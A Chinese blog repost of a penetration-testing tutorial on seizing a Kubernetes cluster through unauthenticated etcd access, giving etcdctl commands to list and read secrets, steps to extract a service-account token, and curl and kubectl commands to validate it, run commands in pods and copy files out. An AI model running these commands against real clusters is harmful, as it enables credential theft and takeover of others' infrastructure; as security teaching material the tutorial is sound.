首页 > 其他分享 >【k8s安全】etcd未授权到控制k8s集群

【k8s安全】etcd未授权到控制k8s集群

时间:2024-11-08 11:41:42浏览次数:2  
标签:kubectl etcd -- token 集群 https k8s

免责声明

本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号团队不为此承担任何责任。

在安装完 K8s 后,默认会安装 etcd 组件,etcd 是一个高可用的 key-value 数据库,它为 k8s 集群提供底层数据存储,保存了整个集群的状态。大多数情形下,数据库中的内容没有加密,因此如果黑客拿下 etcd,就意味着能控制整个 K8s 集群。

etcd 未授权访问

如果目标在启动 etcd 的时候没有开启证书认证选项,且 2379 端口直接对外开放的话,则存在 etcd 未授权访问漏洞。

访问目标的 https://IP:2379/versionhttps://IP:2379/v2/keys,看看是否存在未授权访问。如果显示如下,则证明存在未授权访问。

1.查找token

需要使用到 etcd 命令行连接工具:etcdctl

由于 Service Account 关联了一套凭证,存储在 Secret 中。因此我们可以过滤 Secret,查找具有高权限的 Secret,然后获得其 token 接管 K8s 集群

#查找所有的secret

ETCDCTL_API\=3 ./etcdctl --insecure-transport\=false --insecure-skip-tls-verify --endpoints\=https://172.16.200.70:2379/ get / --prefix --keys-only|sort|uniq| grep secret

从返回的数据中挑选出一个具有高权限的 role 并读取其 token,以 /registry/secrets/kube-system/dashboard-admin-token-c7spp 为例,其中 kube-system 代表 namespace、dashboard-admin 是 clusterrole

#查找指定secret保存的证书和token

ETCDCTL_API\=3 ./etcdctl --insecure-transport\=false --insecure-skip-tls-verify --endpoints\=https://172.16.200.70:2379/ get /registry/secrets/kube-system/dashboard-admin-token-c7spp

复制 token,最后的 token 为 token? 和 #kubernetes.io/service-account-token 之间的部分

如果机器上安装了 KubeOperator 存在弱口令,登录之后可以在集群中获取管控 token

如果不知道 server api 可以通过 webkubectl 获取kubectl cluster-info

2.验证token有效性

curl --header "Authorization: Token" -X GET https://172.16.200.70:6443/api -k

3.使用 kebuctl 去执行命令

这里直接指定 token 去执行命令,或者可以通过制作配置文件指定配置文件来执行但是比较复杂

kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --token="[ey...]" -n kube-system get pods

kebuctl 常用命令

# 查看所有的资源信息

kubectl get all

kubectl get --all-namespaces
# 获取pods列表

kubectl get pods -o wide --all-namespaces

-n 指定命令空间

-o wide 展示详细信息

# 执行命令

kubectl exec -it podsname -n namespace -- command
-- bash 进入 shell
# 下载文件

kubectl cp -n 命名空间 pod名字:/data/1.hprof(在pod中要下载文件的路径) (本地保存文件的路径)

学习文章

• K8s集群安全攻防(上)

• K8s集群安全攻防(下):https://xz.aliyun.com/t/12930

文章来源:https://forum.butian.net/share/3755

标签:kubectl,etcd,--,token,集群,https,k8s
From: https://www.cnblogs.com/o-O-oO/p/18534175

相关文章

  • 【K8S问题系列】Kubernetes Pod节点CrashLoopBackOff 状态【已解决】
    在Kubernetes中,Pod的状态为CrashLoopBackOff表示某个容器在启动后崩溃,Kubernetes尝试重启该容器,但由于持续崩溃,重启的间隔时间逐渐增加。下面将详细介绍CrashLoopBackOff状态的原因、解决方案及相关命令的输出解释。一、CrashLoopBackOff状态的详细介绍描述C......
  • quartz集群增强版
    quartz集群增强版......
  • repmgr搭建一主+一从+一witness的PostgreSQL高可用集群
    测试环境环境如下:OS:ubuntu20PostgreSQL:PostgreSQL16.4repmgr:repmgr5.3.3三台测试环境,均已安装好PostgreSQL16.4,数据库实例信息如下IP         postgresql实例名  身份192.168.152.100:postgresql9000:  主节点192.168.152.101:postgresql9000:  从节点192.16......
  • etcd分布式键值存储系统
    etcdetcd是一个分布式键值存储系统,它在分布式系统领域具有重要地位,以下是关于它的详细介绍:一、基本概述etcd是用Go语言开发的,具有高可用性、强一致性、分布式等特点,主要用于存储和管理关键数据,并在分布式系统中起到协调和同步的作用。二、核心特性1.高可用性etcd......
  • docker实现redis集群
    1.主从模式(Master-Slave)1.1主从复制原理主从复制是redis的一种基本的集群方式,它通过将一个Redis节点(主节点)的数据复制到一个或多个其他Redis节点来实现数据的冗余和备份主节点负责处理客户端的写操作,同时从节点回自动同步主节点的数据。客户端可以从从节点读取数据,实现读取分离......
  • 基于Centos7.X部署mysql8.4集群(主备)
    1、目标    将在主库的数据变更同步到从库,从而保证主库和从库的数据一致。2、原理    2.1主库会把数据变更记录在二进制日志文件Binlog中    2.2从库连接主库,读取binlog日志,并写入自身中继日志relaylog    2.3slave重做中继日志,将改变......
  • GPU 环境搭建指南:如何在裸机、Docker、K8s 等环境中使用 GPU
    本文主要分享在不同环境,例如裸机、Docker和Kubernetes等环境中如何使用GPU。跳转阅读原文:GPU环境搭建指南:如何在裸机、Docker、K8s等环境中使用GPU1.概述仅以比较常见的NVIDIAGPU举例,系统为Linux,对于其他厂家的GPU设备理论上流程都是一样的。省流:对于裸......
  • K8S备份-恢复-迁移神器-Velero
    K8S备份-恢复-迁移神器-Velero前言Kubernetes集群备份一直是我们的痛点。虽然可以通过备份ETCD来实现K8S集群备份,但是这种备份很难恢复单个Namespace。今天推荐Velero工具,它提供以下功能:灾备场景:提供备份恢复k8s集群的能力迁移场景:提供拷贝集群资源到其他集群的能力(复制......
  • 5个维度对Kubernetes集群优化
    5个维度对Kubernetes集群优化一、节点配额和内核参数调整对于公有云上的Kubernetes集群,规模大了之后很容器碰到配额问题,需要提前在云平台上增大配额。这些需要增大的配额包括:虚拟机个数vCPU个数内网IP地址个数公网IP地址个数安全组条数路由表条数持久化存储大小......
  • 3分钟部署生产级k8s集群
    3分钟部署生产级k8s集群什么是sealos?sealos:sealos是一个kubernetes高可用安装工具,一条命令,离线安装,包含所有依赖,内核负载不依赖haproxykeepalived,纯golang开发,99年证书,支持v1.14.9v1.15.6v1.16.3v1.17.0。概览图​​前提条件安装并启动docker,高版本离线包自......